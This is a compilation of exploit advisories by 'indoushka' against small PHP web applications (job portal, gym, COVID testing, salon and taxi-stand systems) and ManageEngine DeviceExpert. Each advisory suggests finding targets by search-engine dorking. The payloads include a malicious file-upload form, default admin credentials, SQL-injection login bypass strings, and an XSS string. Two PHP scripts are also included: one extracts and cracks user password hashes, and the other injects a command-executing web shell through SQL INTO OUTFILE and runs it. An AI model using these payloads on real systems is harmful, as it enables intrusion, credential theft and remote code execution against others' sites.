<pre><code>=============================================================================================================================================<br />| # Title : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 10.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : rec_detail.php.<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Recruitment Form</title><br /></head><br /><body><br /> <h1>Recruitment Form</h1><br /> <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data"><br /> <!-- File input for photograph --><br /> <label for="photograph">Photograph:</label><br /> <input type="file" id="photograph" name="photograph" required><br><br><br /><br /> <!-- Text input for place of birth --><br /> <label for="placeofbirth">Place of Birth:</label><br /> <input type="text" id="placeofbirth" name="placeofbirth" required><br><br><br /><br /> <!-- Text input for father's/husband's name --><br /> <label for="fhname">Father's/Husband's Name:</label><br /> <input type="text" id="fhname" name="fhname" required><br><br><br /><br /> <!-- Select input for marital status --><br /> <label for="marital_status">Marital Status:</label><br /> <select id="marital_status" name="marital_status"><br /> <option value="single">Single</option><br /> <option value="married">Married</option><br /> <option value="divorced">Divorced</option><br /> </select><br><br><br /><br /> <!-- Select input for nationality --><br /> <label for="Nationality">Nationality:</label><br /> <select id="Nationality" name="Nationality"><br /> <option value="national1">Nationality 1</option><br /> <option value="national2">Nationality 2</option><br /> </select><br><br><br /><br /> <!-- Select input for handicapped --><br /> <label for="handicapped">Handicapped:</label><br /> <select id="handicapped" name="handicapped"><br /> <option value="yes">Yes</option><br /> <option value="no">No</option><br /> </select><br><br><br /><br /> <!-- Select input for religion --><br /> <label for="religion">Religion:</label><br /> <select id="religion" name="religion"><br /> <option value="religion1">Religion 1</option><br /> <option value="religion2">Religion 2</option><br /> </select><br><br><br /><br /> <!-- Select input for blood group --><br /> <label for="blood">Blood Group:</label><br /> <select id="blood" name="blood"><br /> <option value="A+">A+</option><br /> <option value="B+">B+</option><br /> <option value="AB+">AB+</option><br /> <option value="O+">O+</option><br /> <option value="O-">O-</option><br /> </select><br><br><br /><br /> <!-- Text input for mark --><br /> <label for="mark">Identification Mark:</label><br /> <input type="text" id="mark" name="mark" required><br><br><br /><br /> <!-- Submit button --><br /> <input type="submit" value="Submit"><br /> </form><br /></body><br /></html><br /><br /><br />[+] http://127.0.0.1/Recruitment-Portal-master/images/.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/ifsc-code-finder-project-using-php/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = Test@123<br /><br />[+] http://127.0.0.1/ifscfinder/admin/login.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : GYM Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/gym-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin@gmail.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : USer & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/eahp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://manageengine.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.<br /><br />[+] LIne 87 set your targer .<br /> <br />[+] usage : C:\www\test>php 3.php<br /><br />[+] Payload :<br /><br /><?php<br />class ManageEngineDeviceExpert {<br /> private $host;<br /> private $port;<br /> private $ssl;<br /><br /> public function __construct($host, $port = 6060, $ssl = true) {<br /> $this->host = $host;<br /> $this->port = $port;<br /> $this->ssl = $ssl;<br /> }<br /><br /> private function sendRequest($path) {<br /> $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;<br /> $ch = curl_init($url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /> return $response;<br /> }<br /><br /> public function getUsers() {<br /> echo "Reading users from master...\n";<br /> $response = $this->sendRequest('/ReadUsersFromMasterServlet');<br /> if (!$response) {<br /> echo "Connection failed\n";<br /> return null;<br /> }<br /> if (strpos($response, '<discoverydata>') !== false) {<br /> preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);<br /> echo "Found " . count($matches[0]) . " users\n";<br /> return $matches[0];<br /> } else {<br /> echo "Could not find any users\n";<br /> return null;<br /> }<br /> }<br /><br /> public function parseUserData($user) {<br /> if (!$user) return null;<br /><br /> preg_match('/<username>([^<]+)<\/username>/', $user, $username);<br /> preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);<br /> preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);<br /> preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);<br /> preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);<br /><br /> $hash = base64_decode($encoded_hash[1]);<br /> $password = null;<br /><br /> $weak_passwords = ['12345', 'admin', 'password', $username[1]];<br /> foreach ($weak_passwords as $weak_password) {<br /> if (md5($weak_password . $salt[1]) == bin2hex($hash)) {<br /> $password = $weak_password;<br /> break;<br /> }<br /> }<br /><br /> return [<br /> 'username' => $username[1],<br /> 'password' => $password,<br /> 'hash' => bin2hex($hash),<br /> 'role' => $role[1],<br /> 'email' => $email[1],<br /> 'salt' => $salt[1]<br /> ];<br /> }<br /><br /> public function run() {<br /> $users = $this->getUsers();<br /> if (!$users) return;<br /><br /> foreach ($users as $user) {<br /> $user_data = $this->parseUserData($user);<br /> if (!$user_data) continue;<br /><br /> echo "User: " . $user_data['username'] . "\n";<br /> echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";<br /> echo "Hash: " . $user_data['hash'] . "\n";<br /> echo "Role: " . $user_data['role'] . "\n";<br /> echo "Email: " . $user_data['email'] . "\n";<br /> echo "Salt: " . $user_data['salt'] . "\n";<br /> echo "----------------------------\n";<br /> }<br /> }<br />}<br /><br />// استخدام الكلاس<br />$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');<br />$deviceExpert->run();<br />?><br /><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COVID19 - Testing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/covid-tms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BP Monitoring Management System 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : USer = 'or''='@gmail.com & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/atsms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt><br /><br />[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Men Salon Management System 2.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/msms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\msms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
